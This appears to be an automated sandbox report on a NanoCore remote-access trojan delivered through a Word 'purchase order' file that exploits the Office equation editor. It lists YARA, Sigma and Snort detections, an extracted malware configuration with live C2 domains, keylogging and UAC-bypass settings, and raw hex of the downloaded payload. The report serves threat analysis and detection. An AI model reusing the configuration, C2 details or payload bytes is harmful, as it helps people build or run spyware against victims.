16.2.cat464923.exe.32cb366.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5e7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d614:$x2: IClientNetworkHost
16.2.cat464923.exe.32cb366.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5e7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6c2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d601:$s5: IClientLoggingHost
16.2.cat464923.exe.32cb366.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.cat464923.exe.32cb366.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d59d:$a: NanoCore 0x2d5b2:$a: NanoCore 0x2d5e7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d359:$b: ClientPlugin 0x2d374:$b: ClientPlugin
16.2.cat464923.exe.32d47c5.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24188:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241b5:$x2: IClientNetworkHost
16.2.cat464923.exe.32d47c5.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24188:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25263:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241a2:$s5: IClientLoggingHost
16.2.cat464923.exe.32d47c5.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.cat464923.exe.34a4d80.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.cat464923.exe.34a4d80.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.cat464923.exe.34a4d80.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.0.cat464923.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.0.cat464923.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.0.cat464923.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.0.cat464923.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.2.smtpsvc.exe.3174d80.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.smtpsvc.exe.3174d80.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.smtpsvc.exe.3174d80.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
18.2.smtpsvc.exe.33a47c5.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24188:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241b5:$x2: IClientNetworkHost
18.2.smtpsvc.exe.33a47c5.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24188:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25263:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241a2:$s5: IClientLoggingHost
18.2.smtpsvc.exe.33a47c5.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.smtpsvc.exe.33a019c.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
18.2.smtpsvc.exe.33a019c.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
18.2.smtpsvc.exe.33a019c.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.smtpsvc.exe.2374e04.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
18.2.smtpsvc.exe.2374e04.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
11.2.cat464923.exe.3304d80.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
11.2.cat464923.exe.3304d80.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
11.2.cat464923.exe.3304d80.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
Click to see the 142 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\cat464923.exe, ProcessId: 2324, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2352, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2352, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\cat464923.exe, CommandLine: C:\Users\user\AppData\Roaming\cat464923.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cat464923.exe, NewProcessName: C:\Users\user\AppData\Roaming\cat464923.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cat464923.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2352, ProcessCommandLine: C:\Users\user\AppData\Roaming\cat464923.exe, ProcessId: 2668

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f9198f9a-66a7-4bba-ab1c-dff8091c", "Group": "Default", "Domain1": "tzitziklishop.ddns.net", "Domain2": "tzitziklishop.ddns.net", "Port": 1665, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "", "BackupDNSServer": "37.235.1.177", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for domain / URL

Show sources

Source: carbinz.gq	Virustotal: Detection: 15%			Perma Link
Source: tzitziklishop.ddns.net	Virustotal: Detection: 8%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\cat464923.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Show sources

Source: NEW ORDER Ref PO-298721.doc	Virustotal: Detection: 23%			Perma Link
Source: NEW ORDER Ref PO-298721.doc	ReversingLabs: Detection: 34%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match	File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe	Joe Sandbox ML: detected

Source: 18.0.smtpsvc.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.0.smtpsvc.exe.400000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.0.smtpsvc.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.2.cat464923.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 5.2.cat464923.exe.400000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 16.0.cat464923.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.0.cat464923.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.0.cat464923.exe.400000.3.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.2.smtpsvc.exe.400000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.0.smtpsvc.exe.400000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.2.cat464923.exe.4a0000.5.unpack	Avira: Label: TR/NanoCore.fadte
Source: 18.2.smtpsvc.exe.400000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 5.0.cat464923.exe.400000.3.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cat464923.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cat464923.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: symbols\dll\System.pdb source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source:	Binary string: j,C:\Windows\System.pdb@#P source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\geNROzYNTy\src\obj\Debug\grlL.pdb source: smtpsvc.exe
Source:	Binary string: .pdbD source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source:	Binary string: grlL.pdb0 source: cat464923.exe, 00000005.00000002.2347577380.000000000055D000.00000004.00000020.sdmp

Source: global traffic

DNS query: name: carbinz.gq

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 103.133.106.117:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 103.133.106.117:1665

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: tzitziklishop.ddns.net

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: tzitziklishop.ddns.net

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 103.133.106.117:1665

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 09 Jun 2021 05:47:55 GMTContent-Type: application/x-msdownloadContent-Length: 736256Last-Modified: Tue, 08 Jun 2021 16:00:42 GMTConnection: keep-aliveETag: "60bf942a-b3c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 6a bf 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 32 0b 00 00 08 00 00 00 00 00 00 c2 51 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 51 0b 00 4f 00 00 00 00 60 0b 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 38 50 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c8 31 0b 00 